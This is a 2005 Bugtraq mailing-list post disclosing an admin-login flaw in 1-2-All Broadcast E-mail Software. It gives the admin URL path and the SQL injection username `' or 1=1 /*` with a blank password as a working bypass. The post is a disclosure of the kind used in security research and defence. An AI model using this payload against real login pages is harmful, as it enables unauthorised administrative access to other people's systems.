1-2-All Broadcast E-mail Software vulnerable to a classic SQL admin

bhs_team_at_yahoo.com
Date: 11/11/05

Next message: s2b_at_hotmail.com: "Cyphor (Release: 0.19) Sql injection"

Previous message: crazy frog crazy frog: "Midicart sql injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]

Date: 11 Nov 2005 19:52:41 -0000
To: bugtraq@securityfocus.com

('binary' encoding is not supported, stored as-is) 1-2-All Broadcast E-mail Software ( POC )
Supplying the following is sufficient to gain access to the admin control panel:

Target :

http://www.example.com/[12allTarget]/admin/index.php

Username: ' or 1=1 /*
Password: (Nothing)(Blank)

Report By : POPO
>From>IRAN> www.Babol-Hackers.com
bhs_team@yahoo.com
Y! ID : bhs_team , pooya_0nline
-----------------------------------
BHS-Team

We Are : POPO + Padeshah + Black ICE + Ezraeil + UNDERTAKER + Fa0p

Next message: s2b_at_hotmail.com: "Cyphor (Release: 0.19) Sql injection"

Previous message: crazy frog crazy frog: "Midicart sql injection"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]